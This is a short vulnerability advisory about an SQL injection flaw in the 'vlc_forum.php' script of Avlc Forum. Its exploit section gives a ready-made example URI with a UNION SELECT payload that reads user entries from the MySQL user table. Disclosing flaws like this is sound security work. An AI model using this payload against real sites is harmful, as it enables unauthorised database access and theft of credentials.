Avlc Forum 'vlc_forum.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Avlc Forum 'vlc_forum.php' SQL Injection Vulnerability

An attacker can exploit this issue with a browser.

The following example URI is available:

http://www.example.com/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--